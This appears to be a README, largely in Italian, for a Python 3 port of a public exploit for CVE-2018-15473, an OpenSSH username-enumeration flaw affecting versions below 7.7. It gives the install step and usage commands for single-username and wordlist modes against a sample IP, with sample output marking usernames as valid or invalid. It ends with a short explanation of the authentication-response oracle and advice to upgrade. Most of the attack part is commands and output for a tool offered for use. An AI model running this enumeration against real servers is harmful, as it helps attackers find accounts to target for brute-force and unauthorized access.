
Exploit basato su Python per CVE-2018-15473 che abilita l'enumerazione dei nomi utente OpenSSH tramite oracolo di risposta all'autenticazione, con modalità utente singolo e wordlist.
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Versione modificata dell'exploit originale: https://www.exploit-db.com/exploits/45233
Convertito in Python3
Aggiunta opzione per wordlist di username
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
Il sistema risponde in modo diverso ai tentativi di autenticazione validi e non validi. Un utente remoto può inviare richieste appositamente modificate per determinare gli username validi sul sistema target. In questo modo, un utente remoto può determinare gli username validi sul sistema target.
Il server OpenSSH dovrebbe essere aggiornato alla versione 7.7 o superiore.